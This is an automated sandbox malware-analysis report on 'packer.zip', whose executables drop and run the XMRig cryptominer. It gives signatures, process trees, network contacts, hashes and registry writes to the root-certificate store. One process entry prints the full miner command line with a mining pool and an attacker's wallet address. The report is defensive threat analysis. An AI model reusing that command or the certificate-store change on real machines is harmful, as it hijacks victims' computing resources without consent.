Malware Analysis Report

2024-07-28 16:45

Sample ID 240616-v1237szgpc
Target packer.zip
SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags
xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

xmrig

XMRig Miner payload

Executes dropped EXE

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Modifies system certificate store

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Subvert Trust Controls
T1553
Install Root Certificate
T1553.004
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-16 17:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:28

Platform

win10v2004-20240508-en

Max time kernel

1785s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:28

Platform

win10v2004-20240508-en

Max time kernel

1733s

Max time network

1746s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:28

Platform

win10v2004-20240508-en

Max time kernel

1767s

Max time network

1782s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 52.111.229.43:443 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:30

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 388 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 388 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4220-14-0x000002978FE90000-0x000002978FEB0000-memory.dmp

memory/4220-15-0x00000297919A0000-0x00000297919C0000-memory.dmp

memory/4220-16-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-17-0x00000297919C0000-0x00000297919E0000-memory.dmp

memory/4220-18-0x00000297919E0000-0x0000029791A00000-memory.dmp

memory/4220-19-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-20-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-21-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-22-0x00000297919C0000-0x00000297919E0000-memory.dmp

memory/4220-23-0x00000297919E0000-0x0000029791A00000-memory.dmp

memory/4220-24-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-25-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-26-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-27-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-28-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-29-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-30-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-31-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-32-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-33-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-34-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-35-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-36-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-37-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-38-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-39-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-40-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-41-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-42-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-43-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-44-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-45-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-46-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-47-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-48-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-49-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-50-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-51-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-52-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-53-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-54-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-55-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-56-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-57-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-58-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-59-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-60-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-61-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-62-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-63-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-64-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-65-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-66-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-67-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-68-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-69-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-70-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-71-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-72-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-73-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-74-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-75-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-76-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-77-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-78-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-79-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-80-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-81-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

memory/4220-82-0x00007FF620DA0000-0x00007FF6218A3000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:33

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3888,i,13640054265074968359,8146127767143474550,262144 --variations-seed-version --mojo-platform-channel-handle=1036 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3816,i,13640054265074968359,8146127767143474550,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:34

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
